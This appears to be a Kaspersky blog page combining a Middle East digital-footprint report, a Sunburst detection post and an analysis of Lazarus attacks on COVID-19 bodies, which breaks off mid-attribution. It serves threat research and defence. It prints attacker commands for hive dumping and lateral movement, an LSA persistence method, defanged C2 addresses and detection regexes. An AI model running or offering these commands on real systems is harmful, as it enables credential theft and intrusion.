More information about UNC2452, DarkHalo, Sunburst and Kazuar is available to customers of the Kaspersky Intelligence Reporting service. Contact: intelreports[at]kaspersky.com

29 December 2020

Digital Footprint Intelligence Report

Introduction

The Digital Footprint Intelligence Service announces the results of research on the digital footprints of governmental, financial and industrial organizations for countries in the Middle East region: Bahrain, Egypt, Iran, Iraq, Jordan, Kuwait, Lebanon, Oman, Qatar, Saudi Arabia, Sudan, Syria, Turkey, UAE, Yemen. The data presented in this report was collected through Kaspersky’s own threat research and analysis mechanism and various other open sources during Q3 2020. The exceptions are Iran, Iraq, Sudan, Syria and Yemen for which only open source data was used. Official entities can request the more detailed results of subsequent research and analysis via dfi@kaspersky.com.

The service is designed to provide customers with an analysis of their footprint in open networks and an overview of the opportunities presented to adversaries. Assessing a company’s assets from the perspective of an attacker, their possible intentions and their potential opportunities was among the key considerations for cyberthreat intelligence analysts when compiling this report.

Sources of intelligence

Scope of report

There are many organizations that belong to the three key verticals – governmental, financial and industrial – across the Middle East region, but this report focuses on critical organizations with vulnerabilities.


Distribution of vulnerable IP addresses by percentage


Share of vulnerabilities by country in the Middle East region

Statistics of detected vulnerabilities on services

What’s behind the statistics

  • Vulnerable networks
    • Lack of security updates
    • Bad network service configuration
    • Management interfaces available publicly
  • Data leaks
    • Corporate accounts in databases of leaked passwords
    • Leaked financial data
  • Dark web
    • Access to compromised infrastructure for sale
    • Methodological materials

Depending on the complexity of the exploitation and the damage caused, the detected vulnerabilities are divided into five levels:

  • Critical – Vulnerabilities that, if exploited, can compromise an infrastructure resource in one step;
  • High – Vulnerabilities that, if exploited, will give access to infrastructure in two or more steps. Additional data (e.g. credentials) to penetrate the infrastructure may be required;
  • Medium – Vulnerabilities that allow an attacker to obtain useful information about a resource that can be used to obtain restricted access: e.g. management interfaces of various services, directory listing, protocols that transfer data unencrypted, etc.;
  • Low – Vulnerabilities that allow an attacker to collect information about a resource, such as logins used in the system, access as anonymous user to various services, etc.;
  • Information – Vulnerabilities related to security flaws, such as default and start pages of web services, printer services and various software that can be used to perform DDoS attacks, routing protocols, etc.
Importance of vulnerability based on industry vertical

The governmental sector leads the way in critical-level vulnerabilities, whereas the standard cybercriminal target – the financial industry – has mostly low-level vulnerabilities.

Industrial companies fall in the middle of this spectrum, though their share of medium-level vulnerabilities still deserves attention. Most of these vulnerabilities lead to the disclosure of information about a resource that can be used to obtain restricted access.

Share of vulnerabilities across various verticals

Share of vulnerable companies across various verticals

Which companies have critical vulnerabilities?

  • 30% of industrial companies have critical-level vulnerabilities;
  • Every third industrial company is prone to critical-level vulnerabilities;
  • Every second industrial and government organization has high-level vulnerabilities;
  • 7% of all banking organizations in the Middle East have critical vulnerabilities.
Vulnerabilities that can be exploited by adversaries

Security issues in various verticals:

  • 2% of governmental organizations in the scope of the research have Microsoft Windows 2000 in their environments;
  • A large share of misconfigured services in industrial companies indicates a low level of information security maturity;
  • Among the resources in the industrial sector, both old vulnerabilities (e.g. HEARTBLEED) and the latest vulnerabilities (e.g. vulnerabilities in Citrix network equipment) were found.

Vulnerabilities by categories

Vulnerable services by type

Which services are vulnerable?

  • 3% of vulnerable web servers are related to banking organizations;
  • DBMS and FTP servers are most vulnerable in industrial companies;
  • 3% of all exposed remote management interfaces belong to government bodies, placing them first worldwide.
Statistics on obsolete software in companies of the Middle East region


Obsolete software in the region

Data leaks

Corporate accounts of employees from 253 organizations (from a total of 402) were found in public dumps of compromised third-party services. This indicates that employees use their corporate emails to register on external services, for example, social media networks.

Corporate accounts leakage in the region

The highest numbers

  • More than 50% of those accounts are linked to banking organizations in Turkey;
  • About 48% of such accounts linked to industrial companies are in Saudi Arabia.

If employees use compromised passwords for external services as well as for corporate resources, that information can be used to gain unauthorized access to those resources.

The scope of the Digital Footprint Intelligence Service is not restricted to public sources only – it also tracks the activity of cybercriminals on resources with limited access such as darknet forums and stores. The analyzed data includes demand and offers for credit cards and online banking accounts, insider hiring activities, the sale of compromised corporate accounts and client and employee databases, ongoing bounties for top managers, etc.

Statistics on activity in darknet forums and stores

The majority of the topics and adverts discovered on darknet forums are related to bank card sales. We observed a fall in demand for bank cards in February 2020 after the festive season. The decrease was also caused by global lockdowns related to the COVID-19 pandemic.

Customer traffic in e-commerce has rocketed due to the coronavirus and it has naturally led to an increase in fraudulent activities such as phishing. Offers of online banking accounts and credit cards increased on darknet forums in May.

The dark web and the financial industry

Analysis of shadow activities related to the Middle East financial sector revealed that bank cards of four out of 15 countries were found on sale in darknet stores.

Bank card dumps and numbers (with/without CVV) are in high demand among criminals. Information of this kind can be used both for stealing money, for example by making purchases in online shops, and for money laundering.

Share of bank cards in darknet stores by country

By Q3 2020, more than 78,000 credit card numbers and corresponding CVV/CVV2s of Middle East banks were found in darknet stores.

Distribution of cards by type

Sales of payment cards with CVVs increased in July and August due to the opening of national borders after COVID-19 lockdowns were eased.

Distribution of banking cards sold by month

23 December 2020

How we protect our users against the Sunburst backdoor

What happened

SolarWinds, a well-known IT managed services provider, has recently become a victim of a cyberattack. Their product Orion Platform, a solution for monitoring and managing their customers’ IT infrastructure, was compromised by threat actors. This resulted in the deployment of a custom Sunburst backdoor on the networks of more than 18,000 SolarWinds customers, with many large corporations and government entities among the victims.

According to our Threat Intelligence data, the victims of this sophisticated supply-chain attack were located all around the globe: the Americas, Europe, Middle East, Africa and Asia.

After the initial compromise, the attackers appear to have chosen the most valuable targets among their victims. The companies that appeared to be of special interest to the malicious actors may have been subjected to deployment of additional persistent malware.

Overall, the evidence available to date suggests that the SolarWinds supply-chain attack was designed in a professional manner. The perpetrators behind the attack made it a priority to stay undetected for as long as possible: after the installation, the Sunburst malware lies dormant for an extended period of time, keeping a low profile and thwarting automated sandbox-type analysis and detection. Additionally, the backdoor utilizes a sophisticated scheme for victim reporting, validation and upgrading which resembles methods involved in some other notorious supply-chain attacks.

Read more about our research on Sunburst malware here. Additional reports and indicators of compromise are available to our Threat Intelligence Portal customers.

How to protect your organization against this threat

The detection logic has been improved in all our solutions to ensure that our customers remain protected. We continue to investigate this attack using our Threat Intelligence and we will add further detection logic as it is required.

Our products protect against this threat and detect it with the following names:

  • Backdoor.MSIL.Sunburst.a
  • Backdoor.MSIL.Sunburst.b
  • HEUR:Trojan.MSIL.Sunburst.gen
  • HEUR:Backdoor.MSIL.Sunburst.gen

Screenshot of our TIP portal with one of the IoCs from the SolarWinds breach

Our Behavior Detection component detects activity of the trojanized library as PDM:Trojan.Win32.Generic.

Our Endpoint Detection and Response (Expert) platform can be helpful in looking for and identifying traces of this attack. The customer can search for Indicators of Compromise (such as hashes or domain names) with an .ioc file or directly with the Threat Hunting interface:

Or, customers can use the IoA Tag, which we have added specifically for this attack:

This rule marks endpoint detections for Sunburst to make it more clearly visible to security officers:

Our Kaspersky Anti-Targeted Attack Platform detects Sunburst traffic with a set of IDS rules with the following verdicts:

  • Trojan.Sunburst.HTTP.C&C
  • Backdoor.Sunburst.SSL.C&C
  • Backdoor.Sunburst.HTTP.C&C
  • Backdoor.Sunburst.UDP.C&C
  • Backdoor.Beacon.SSL.C&C
  • Backdoor.Beacon.HTTP.C&C
  • Backdoor.Beacon.UDP.C&C

Our Managed Detection and Response service is also able to identify and stop this attack by using threat hunting rules to spot various activities that can be performed by the Sunburst backdoor as well as detections from Kaspersky Endpoint Security.

Sunburst / UNC2452 / DarkHalo FAQ
  1. Who is behind this attack? I read that some people say APT29/Dukes?
    At the moment, there are no technical links with previous attacks, so it may be an entirely new actor, or a previously known one that evolved their TTPs and opsec to the point where they can’t be linked anymore. Volexity, who previously worked on other incidents related to this, named the actor DarkHalo. FireEye named them “UNC2452”, suggesting an unknown actor. While some media sources linked this with APT29/Dukes, this appears to be either speculation or based on some other, unavailable data, or weak TTPs such as legitimate domain re-use.
  2. I use Orion IT! Was I a target of this attack?
    First of all, we recommend scanning your system with an updated security suite, capable of detecting the compromised packages from SolarWinds. Check your network traffic for all the publicly known IOCs – see https://github.com/fireeye/sunburst_countermeasures. The fact that someone downloaded the trojanized packages doesn’t also mean they were selected as a target of interest and received further malware, or suffered data exfiltration. It would appear, based on our observations and common sense, that only a handful of the 18,000 Orion IT customers were flagged by the attackers as interesting and were further exploited.
  3. Was this just espionage or did you observe destructive activities, such as ransomware?
    While the vast majority of the high-profile incidents nowadays include ransomware or some sort of destructive payload (see NotPetya, Wannacry) in this case, it would appear the main goal was espionage. The attackers showed a deep understanding and knowledge of Office365, Azure, Exchange, Powershell and leveraged it in many creative ways to constantly monitor and extract e-mails from their true victims’ systems.
  4. How many victims have been identified?
    Several publicly available data sets, such as the one from John Bambenek, include DNS requests encoding the victim names. It should be noted that these victim names are just the “first stage” recipients, not necessarily the ones the attackers deemed interesting. For instance, out of the ~100 Kaspersky users with the trojanized package, it would appear that none were interesting to the attackers to receive the 2nd stage of the attack.
  5. What are the most affected countries?
    To date, we observed users with the trojanized Orion IT package in 17 countries. However, the total number is likely to be larger, considering the official numbers from SolarWinds.
  6. Why are you calling this an attack, when it’s just exploitation? (CNA vs CNE)
    Sorry for the terminology, we simply refer to it as a “supply chain attack”. It would be odd to describe it as a “supply chain exploitation”.
  7. Out of the 18,000 first stage victims, how many were interesting to the attackers?
    This is difficult to estimate, mostly because of the lack of visibility and because the attackers were really careful in hiding their traces. Based on the CNAME records published by FireEye, we identified only two entities, a US government organization and a telecommunications company, who were tagged and “promoted” to dedicated C2s for additional exploitation.
  8. Why didn’t you catch this supply chain attack in the first place?
    That’s a good question! In particular, two things made it really stealthy. The slow communication method, in which the malware lies dormant for up to two weeks, is one of them. The other one is the lack of x86 shellcode; the attackers used a .NET injected module. Last but not least, there was no significant change in the file size of the module when the malicious code was added. We observed two suspicious modules in 2019, which jumped from the usual 500k to 900k for SolarWinds.Orion.Core.BusinessLayer.dll. When the malicious code was first added, in February 2020, the file didn’t change size in a significant manner. If the attackers did this on purpose, to avoid future detections, then it’s a pretty impressive thing.
  9. What is Teardrop?
    According to FireEye, Teardrop is malware delivered by the attackers to some of the victims. It is an unknown memory-only dropper suspected to deliver a customized version of the well-known CobaltStrike BEACON. To date, we haven’t detected any Teardrop samples anywhere.
  10. What made this such a successful operation?
    Probably, a combination of things – a supply chain attack, coupled with a very well thought-out first stage implant, careful victim selection strategies and last but not least, no obvious connections to any previously observed TTPs.
23 December 2020

Lazarus covets COVID-19-related intelligence

As the COVID-19 crisis grinds on, some threat actors are trying to speed up vaccine development by any means available. We have found evidence that actors, such as the Lazarus group, are going after intelligence that could help these efforts by attacking entities related to COVID-19 research.

While tracking the Lazarus group’s continuous campaigns targeting various industries, we discovered that they recently went after COVID-19-related entities. They attacked a pharmaceutical company at the end of September, and during our investigation we discovered that they had also attacked a government ministry related to the COVID-19 response. Each attack used different tactics, techniques and procedures (TTPs), but we found connections between the two cases and evidence linking those attacks to the notorious Lazarus group.

Relationship of recent Lazarus group attack

In this blog, we describe two separate incidents. The first one is an attack against a government health ministry: on October 27, 2020, two Windows servers were compromised at the ministry. We were unable to identify the infection vector, but the threat actor was able to install a sophisticated malware cluster on these servers. We already knew this malware as ‘wAgent’. Its main component only works in memory and it fetches additional payloads from a remote server.

The second incident involves a pharmaceutical company. According to our telemetry, this company was breached on September 25, 2020. This time, the Lazarus group deployed the Bookcode malware, previously reported by ESET, in a supply chain attack through a South Korean software company. We were also able to observe post-exploitation commands run by Lazarus on this target.

Both attacks leveraged different malware clusters that do not overlap much. However, we can confirm that both of them are connected to the Lazarus group, and we also found overlaps in the post-exploitation process.

wAgent malware cluster

The malware cluster has a complex infection scheme:

Infection scheme of the wAgent malware cluster

Unfortunately, we were unable to obtain the starter module used in this attack. The module seems to have a trivial role: executing wAgent with specific parameters. One of the wAgent samples we collected has fake metadata in order to make it look like the legitimate compression utility XZ Utils.

According to our telemetry, this malware was directly executed on the victim machine from the command line shell by calling the Thumbs export function with the parameter:

c:\windows\system32\rundll32.exe C:\Programdata\Oracle\javac.dat, Thumbs 8IZ-VU7-109-S2MY

The 16-byte string parameter is used as an AES key to decrypt an embedded payload – a Windows DLL. When the embedded payload is loaded in memory, it decrypts configuration information using the given decryption key. The configuration contains various information including C2 server addresses, as well as a file path used later on. Although the configuration specifies two C2 servers, it contains the same C2 server twice. Interestingly, the configuration has several URL paths separated with an ‘@’ symbol. The malware attempts to connect to each URL path randomly.

C2 address in the configuration

When the malware is executed for the first time, it generates identifiers to distinguish each victim using the hash of a random value. It also generates a 16-byte random value and reverses its order. Next, the malware concatenates this random 16-byte value and the hash using ‘@’ as a delimiter, for example: 82UKx3vnjQ791PL2@29312663988969

POST parameter names (shown below) are decrypted at runtime and chosen randomly at each C2 connection. We’ve previously seen and reported to our Threat Intelligence Report customers that a very similar technique was used when the Lazarus group attacked cryptocurrency businesses with an evolved downloader malware. It is worth noting that Tistory is a South Korean blog posting service, which means the malware author is familiar with the South Korean internet environment:

plugin course property tistory tag vacon slide parent manual themes product notice portal articles category doc entry isbn tb idx tab maincode level bbs method thesis content blogdata tname 

The malware encodes the generated identifier as base64 and POSTs it to the C2. Finally, the agent fetches the next payload from the C2 server and loads it in memory directly. Unfortunately, we couldn’t obtain a copy of it, but according to our telemetry, the fetched payload is a Windows DLL containing backdoor functionalities. Using this in-memory backdoor, the malware operator executed numerous shell commands to gather victim information:

cmd.exe /c ping -n 1 -a 192.[redacted]
cmd.exe /c ping -n 1 -a 192.[redacted]
cmd.exe /c dir \\192.[redacted]\c$
cmd.exe /c query user
cmd.exe /c net user [redacted] /domain
cmd.exe /c whoami

Persistent wAgent deployed

Using the wAgent backdoor, the operator installed an additional wAgent payload that has a persistence mechanism. After fetching this DLL, an export called SagePlug was executed with the following command line parameters:

rundll32.exe c:\programdata\oracle\javac.io, SagePlug 4GO-R19-0TQ-HL2A c:\programdata\oracle\~TMP739.TMP

4GO-R19-0TQ-HL2A is used as a key and the file path indicates where debugging messages are saved. This wAgent installer works similarly to the wAgent loader malware described above. It is responsible for loading an embedded payload after decrypting it with the 16-byte key from the command line. In the decrypted payload, the malware generates a file path to proceed with the infection:

  • C:\Windows\system32\[random 2 characters]svc.drv

This file is disguised as a legitimate tool named SageThumbs Shell Extension. This tool shows image files directly in Windows Explorer. However, it contains an additional malicious routine.

While creating this file, the installer module fills it with random data to increase its size. The malware also copies cmd.exe’s creation time to the new file in order to make it harder to spot.

For logging and debugging purposes, the malware stores information in the file provided as the second argument (c:\programdata\oracle\~TMP739.TMP in this case). This log file contains timestamps and information about the infection process. We observed that the malware operators were checking this file manually using Windows commands. These debugging messages have the same structure as previous malware used in attacks against cryptocurrency businesses involving the Lazarus group. More details are provided in the Attribution section.

After that, the malware decrypts its embedded configuration. This configuration data has a similar structure as the aforementioned wAgent malware. It also contains C2 addresses in the same format:

  • hxxps://iski.silogica[.]net/events/serial.jsp@WFRForms.jsp@import.jsp@view.jsp@cookie.jsp
  • hxxp://sistema.celllab[.]com.br/webrun/Navbar/auth.jsp@cache.jsp@legacy.jsp@chooseIcon.jsp@customZoom.jsp
  • hxxp://www.bytecortex.com[.]br/eletronicos/digital.jsp@exit.jsp@helpform.jsp@masks.jsp@Functions.jsp
  • hxxps://sac.najatelecom.com[.]br/sac/Dados/ntlm.jsp@loading.jsp@access.jsp@local.jsp@default.jsp

The malware encrypts the configuration data and stores it under a predefined registry key, in a value named after the dropped file:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\eventlog\Application\Emulate – [random 2 characters]svc

It also abuses the Security Support Provider (SSP) mechanism: the name of the dropped file is appended to the end of the existing Security Packages value under the Lsa key. Because LSA loads every package listed there, lsass.exe will load this DLL at the next startup.

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa – Security Packages : kerberos msv1_0 schannel wdigest tspkg pku2u [random 2 characters]svc.drv

Finally, the starter module runs the [random 2 characters]svc.drv file in a remote process: it searches for the first svchost.exe process and injects the DLL into it. The injected [random 2 characters]svc.drv contains a routine for decrypting and loading its embedded payload. The final payload is wAgent, which is responsible for fetching additional payloads from the C2, possibly a fully featured backdoor, and loading them in memory.
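The persistence described above leaves a checkable trace: the Security Packages value should hold only bare package names, never a file with a two-character prefix and an svc.drv suffix, and the dropped file should not share its creation time with cmd.exe. The following Python is an added example for this page, not Kaspersky's or the malware's code. It takes the registry value as data (or reads it live on Windows) and flags entries that do not belong. Assumptions, also noted in the code: the baseline set is the one quoted on the page and must be adjusted to the Windows build under review, since defaults differ between versions; the naming regex follows the page's description of the dropped file.

```python
r"""Hunt for a rogue Security Support Provider entry of the kind wAgent registers.

Added example for this page, not Kaspersky's or the malware's code. It inspects the
HKLM\SYSTEM\CurrentControlSet\Control\Lsa "Security Packages" value, either read live
on Windows or passed in as data so the check runs offline, and flags entries that do
not belong. Assumptions: the baseline set is the one quoted on the page and must be
adjusted to the Windows build under review; the naming regex follows the page's
description of the dropped file name.
"""
import os
import re
import sys
from typing import Iterable, List, Optional, Tuple, Union

# Packages present before the malware appended its own entry (quoted on the page).
BASELINE_SSPS = {"kerberos", "msv1_0", "schannel", "wdigest", "tspkg", "pku2u"}

# wAgent drops [two random characters]svc.drv; the older cryptocurrency case used .dll.
WAGENT_NAME = re.compile(r"^[a-z0-9]{2}svc\.(drv|dll)$", re.IGNORECASE)


def parse_security_packages(value: Union[str, Iterable[str]]) -> List[str]:
    """Accept the REG_MULTI_SZ list winreg returns, or the space-separated rendering
    used on the page, and return the individual entries."""
    if isinstance(value, str):
        return value.split()
    # REG_MULTI_SZ entries are normally one name each; split anyway in case of padding.
    return [tok for entry in value for tok in entry.split()]


def classify_ssp(entry: str) -> Optional[str]:
    """Return why an entry is suspicious, or None if it is a known-good package."""
    if WAGENT_NAME.match(entry):
        return "matches the [2 chars]svc.(drv|dll) naming scheme used by wAgent"
    if "\\" in entry or "/" in entry:
        return "contains a path; SSP entries are bare package names"
    if entry.lower().endswith((".drv", ".dll")):
        return "carries a file extension; legitimate entries do not"
    if entry.lower() not in BASELINE_SSPS:
        return "not in the known-good baseline"
    return None


def find_rogue_ssps(value: Union[str, Iterable[str]]) -> List[Tuple[str, str]]:
    """All (entry, reason) pairs in the Security Packages value that deserve a look."""
    hits = []
    for entry in parse_security_packages(value):
        reason = classify_ssp(entry)
        if reason:
            hits.append((entry, reason))
    return hits


def creation_time_matches(path: str, reference: str) -> Optional[bool]:
    """True if 'path' shares its creation time with 'reference' (cmd.exe on this page),
    the timestomping trick described above. Windows only (st_ctime is the creation
    time there); returns None elsewhere or if either file is missing."""
    if sys.platform != "win32" or not (os.path.exists(path) and os.path.exists(reference)):
        return None
    return int(os.stat(path).st_ctime) == int(os.stat(reference).st_ctime)


def read_live_security_packages() -> Optional[List[str]]:
    """Read the live registry value on Windows; None on other platforms."""
    if sys.platform != "win32":
        return None
    import winreg  # stdlib, Windows only

    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                        r"SYSTEM\CurrentControlSet\Control\Lsa") as key:
        value, _kind = winreg.QueryValueEx(key, "Security Packages")
    return list(value) if isinstance(value, list) else [value]


if __name__ == "__main__":
    # Constructed value mirroring the page's registry entry; 'xk' is a made-up prefix.
    sample = "kerberos msv1_0 schannel wdigest tspkg pku2u xksvc.drv"
    system32 = os.path.join(os.environ.get("SystemRoot", r"C:\Windows"), "System32")
    for name, why in find_rogue_ssps(read_live_security_packages() or sample):
        print(f"suspicious SSP entry {name!r}: {why}")
        if creation_time_matches(os.path.join(system32, name), os.path.join(system32, "cmd.exe")):
            print("  creation time equals cmd.exe's: consistent with timestomping")
```

Run it on a suspect host as an administrator; off-host, feed it the value exported with reg.exe. An entry that is a bare name outside the baseline is not proof of compromise (third-party SSPs exist), but one carrying an extension or matching the naming pattern should be pulled and compared with its debugging log file as described above.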

Bookcode malware cluster

The pharmaceutical company targeted by Lazarus group’s Bookcode malware is developing a COVID-19 vaccine and is authorized to produce and distribute COVID-19 vaccines. We previously saw Lazarus attack a software company in South Korea with Bookcode malware, possibly targeting the source code or supply chain of that company. We have also witnessed the Lazarus group carry out spear phishing or strategic website compromise in order to deliver Bookcode malware in the past. However, we weren’t able to identify the exact initial infection vector for this incident. The whole infection procedure confirmed by our telemetry is very similar to the one described in ESET’s latest publication on the subject.

Bookcode infection procedure

Although we didn’t find the piece of malware tasked with deploying the loader and its encrypted Bookcode payload, we were able to identify a loader sample. This file is responsible for loading an encrypted payload named gmslogmgr.dat located in the system folder. After decrypting the payload, the loader finds the Service Host Process (svchost.exe) with winmgmt, ProfSvc or Appinfo parameters and injects the payload into it. Unfortunately, we couldn’t acquire the encrypted payload file, but we were able to reconstruct the malware actions on the victim machine and identify it as the Bookcode malware we reported to our Threat Intelligence Report customers.

Upon execution, the Bookcode malware reads a configuration file. While previous Bookcode samples used the file perf91nc.inf as a configuration file, this version reads its configuration from a file called C_28705.NLS. This Bookcode sample has almost identical functionality as the malware described in the comprehensive report recently published by Korea Internet & Security Agency (KISA). As described on page 57 of that report, once the malware is started it sends information about the victim to the attacker’s infrastructure. After communicating with the C2 server, the malware provides standard backdoor functionalities.

Post-exploitation phase

The Lazarus group’s campaign using the Bookcode cluster has its own unique TTPs, and the same modus operandi was used in this attack.

  • Extracting information about the infected host, including password hashes, from a dump of the SAM registry hive.
  • Using Windows commands in order to check network connectivity.
  • Using the WakeMeOnLan tool to scan hosts in the same network.

After installing Bookcode on September 25, 2020, the malware operator started gathering system and network information from the victim. The malware operator also saved the SAM and SYSTEM registry hives, from which password hashes can be extracted:

  • cmd.exe /c "reg.exe save hklm\sam $temp\~reg_sam.save > "$temp\BD54EA8118AF46.TMP~" 2>&1"
  • cmd.exe /c "reg.exe save hklm\system $temp\~reg_system.save > "$temp\405A758FA9C3DD.TMP~" 2>&1"

In the lateral movement phase, the malware operator used well-known methodologies. After acquiring account information, they connected to another host with the “net” command and executed a copied payload with the “wmic” command.

  • cmd.exe /c "netstat -aon | find "ESTA" > $temp\~431F.tmp
  • cmd.exe /c "net use \\172.[redacted] "[redacted]" /u:[redacted] > $temp\~D94.tmp" 2>&1"
  • wmic /node:172.[redacted] /user:[redacted] /password:"[redacted]" process call create "$temp\engtask.exe" > $temp\~9DC9.tmp" 2>&1"

Moreover, Lazarus used AdFind to collect additional information from Active Directory. Using this utility, the threat actor extracted a list of the victim's users and computers.
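The command lines quoted above (SAM and SYSTEM hive saves, netstat filtered for established connections, net use to a remote host, wmic process call create, AdFind) are what a defender can hunt for in process-creation telemetry. The following Python is an added example, not Kaspersky's code: it runs a small rule set over Sysmon Event ID 1 style records and escalates a host once its hits span more than one stage of the chain, which is the pattern this page describes. The events are constructed from the commands on the page with fictitious host names, paths and addresses; the field names (UtcTime, Computer, CommandLine) follow Sysmon's.

```python
"""Score process-creation events for the Lazarus post-exploitation chain on this page.

Added example, not Kaspersky's code. Input is a list of Sysmon Event ID 1 style
records (UtcTime, Computer, CommandLine); SAMPLE_EVENTS below is constructed from
the command lines quoted on the page with fictitious hosts, paths and addresses.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# (rule name, regex over the command line). Regexes are deliberately narrow.
RULES: List[Tuple[str, re.Pattern]] = [
    ("sam_hive_save",
     re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system|security)\b", re.I)),
    ("remote_wmic_process_create",
     re.compile(r"\bwmic(?:\.exe)?\s+/node:\S+.*\bprocess\s+call\s+create\b", re.I)),
    ("net_use_remote_host",
     re.compile(r"\bnet(?:\.exe)?\s+use\s+\\\\\S+", re.I)),
    ("admin_share_listing",
     re.compile(r"\bdir\s+\\\\\S+\\[a-z]\$", re.I)),
    ("adfind_enumeration",
     re.compile(r"\badfind(?:\.exe)?\b", re.I)),
    ("netstat_established_filter",
     re.compile(r"\bnetstat\b.*\|\s*find(?:str)?\b.*ESTA", re.I)),
]

# Hits from two or more stages on one host reproduce the sequence the page describes:
# credential collection, discovery, then lateral movement.
STAGE: Dict[str, str] = {
    "sam_hive_save": "credential_access",
    "adfind_enumeration": "discovery",
    "netstat_established_filter": "discovery",
    "admin_share_listing": "discovery",
    "net_use_remote_host": "lateral_movement",
    "remote_wmic_process_create": "lateral_movement",
}


def match_rules(command_line: str) -> List[str]:
    """Names of every rule whose regex fires on the command line."""
    return [name for name, rx in RULES if rx.search(command_line)]


def scan(events: List[Dict[str, str]]):
    """Return (per-event hits, hosts whose hits cover at least two stages)."""
    hits = []
    stages_by_host = defaultdict(set)
    for ev in events:
        names = match_rules(ev["CommandLine"])
        if names:
            hits.append((ev["UtcTime"], ev["Computer"], names))
            for n in names:
                stages_by_host[ev["Computer"]].add(STAGE[n])
    escalated = sorted(h for h, s in stages_by_host.items() if len(s) >= 2)
    return hits, escalated


# Constructed sample: the page's commands, with made-up hosts, credentials and IPs.
SAMPLE_EVENTS = [
    {"UtcTime": "2020-09-25 10:02:11", "Computer": "WS-PHARMA-07",
     "CommandLine": r'cmd.exe /c dir C:\Users'},  # benign control
    {"UtcTime": "2020-09-25 10:14:40", "Computer": "WS-PHARMA-07",
     "CommandLine": r'cmd.exe /c "reg.exe save hklm\sam C:\Windows\Temp\~reg_sam.save > "C:\Windows\Temp\BD54EA8118AF46.TMP~" 2>&1"'},
    {"UtcTime": "2020-09-25 10:14:41", "Computer": "WS-PHARMA-07",
     "CommandLine": r'cmd.exe /c "reg.exe save hklm\system C:\Windows\Temp\~reg_system.save > "C:\Windows\Temp\405A758FA9C3DD.TMP~" 2>&1"'},
    {"UtcTime": "2020-09-25 10:31:05", "Computer": "WS-PHARMA-07",
     "CommandLine": r'cmd.exe /c "netstat -aon | find "ESTA" > C:\Windows\Temp\~431F.tmp'},
    {"UtcTime": "2020-09-25 10:40:22", "Computer": "WS-PHARMA-07",
     "CommandLine": r'cmd.exe /c "net use \\10.20.30.40 "Passw0rd" /u:CORP\svc_ops > C:\Windows\Temp\~D94.tmp" 2>&1"'},
    {"UtcTime": "2020-09-25 10:40:59", "Computer": "WS-PHARMA-07",
     "CommandLine": r'wmic /node:10.20.30.40 /user:CORP\svc_ops /password:"Passw0rd" process call create "C:\Windows\Temp\engtask.exe" > C:\Windows\Temp\~9DC9.tmp" 2>&1"'},
    {"UtcTime": "2020-09-25 11:02:00", "Computer": "SRV-FILE-01",
     "CommandLine": r'adfind.exe -f objectcategory=computer -csv > C:\Windows\Temp\ad_computers.txt'},
]


if __name__ == "__main__":
    found, hosts = scan(SAMPLE_EVENTS)
    for when, host, names in found:
        print(f"{when} {host}: {', '.join(names)}")
    print("hosts to escalate:", hosts)
```

The single-event rules are noisy on their own (administrators save hives and run AdFind too); the value is in the per-host stage count, which separates the workstation that dumped hives and then moved laterally from the server that only ran an AD query.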

Infrastructure of Bookcode

As a result of closely working with the victim to help remediate this attack, we discovered an additional configuration file. It contains four C2 servers, all of which are compromised web servers located in South Korea.

  • hxxps://www.kne.co[.]kr/upload/Customer/BBS.asp
  • hxxp://www.k-kiosk[.]com/bbs/notice_write.asp
  • hxxps://www.gongim[.]com/board/ajax_Write.asp
  • hxxp://www.cometnet[.]biz/framework/common/common.asp

One of those C2 servers had directory listing enabled, so we were able to gain insights as to how the attackers manage their C2 server:

Attacker files listed on a compromised website

We discovered several log files and a script from the compromised server, which is a “first-stage” C2 server. It receives connections from the backdoor, but only serves as a proxy to a “second-stage” server where the operators actually store orders.

Files found on the first-stage C2 server:

  • _ICEBIRD007.dat: a log file containing the identifiers of victims and timestamps.
  • ~F05990302ERA.jpg: the second-stage C2 server address, hxxps://www.locknlockmall[.]com/common/popup_left.asp
  • Customer_Session.asp: the malware control script.

Customer_Session.asp is the first-stage C2 script, responsible for relaying commands from the next-stage C2 server to the implant and command execution results from the implant back. To deliver the right commands to each victim, the bbs_code parameter sent by the implant is used as an identifier, and the script uses it to assign commands to the correct victim. Here is how sending an order to a particular victim works:

  1. The malware operator sets the corresponding flag ([id]_208) of a specific implant and saves the command to the variable ([id]_210).
  2. The implant checks the corresponding flag ([id]_208) and retrieves the command from the variable ([id]_210) if it is set.
  3. After executing the command, the implant sends the result to the C2 server and sets the corresponding flag.
  4. The malware operator checks the flag and retrieves the result if the flag is set.

Logic of the C2 script

Besides implant control features, the C2 script has additional capabilities such as updating the next-stage C2 server address, sending the identifier of the implant to the next-stage server or removing a log file.

Handlers of the C2 script, by table_nm value (function names as spelled in the script):

  • table_qna (qnaview): Set the [id]_209 flag to TRUE and save the "content" parameter value to [id]_211.
  • table_recruit (recuritview): If [id]_209 is set, send the contents of [id]_211, reset it, and set [id]_209 to FALSE.
  • table_notice (notcieview): Set the [id]_208 flag and save the "content" parameter value to [id]_210.
  • table_bVoice (voiceview): If [id]_208 is set, send the contents of [id]_210, reset it, and set [id]_208 to FALSE.
  • table_bProduct (productview): Update the ~F05990302ERA.jpg file with the URL passed as the "target_url" parameter.
  • table_community (communityview): Save the identifier of the implant to the log file. Read the second-stage URL from ~F05990302ERA.jpg and send the current server URL and identifier to the next-hop server in the following format:
    bbs_type=qnaboard&table_id=[base64ed identifier]&accept_identity=[base64 encoded current server IP]&redirect_info=[base64ed current server URL]
  • table_free (freeview): Read _ICEBIRD007.dat, send its contents, and delete it.

Attribution

We assess with high confidence that the activity analyzed in this post is attributable to the Lazarus group. In our previous research, we already attributed the malware clusters used in both incidents described here to the Lazarus group. First of all, we observe that the wAgent malware used against the health ministry has the same infection scheme as the malware that the Lazarus group used previously in attacks on cryptocurrency businesses.

  • Both cases used a similar malware naming scheme, generating two characters randomly and appending “svc” to it to generate the path where the payload is dropped.
  • Both malicious programs use a Security Support Provider as a persistence mechanism.
  • Both malicious programs have almost identical debugging messages.

Here is a side-by-side comparison of the malware used in the ministry of health incident, and the malware (4088946632e75498d9c478da782aa880) used in the cryptocurrency business attack:

Debugging log from the ministry of health case:

15:18:20 Extracted Dll : [random 2bytes]svc.drv
15:59:32 Reg Config Success !
16:08:45 Register Svc Success !
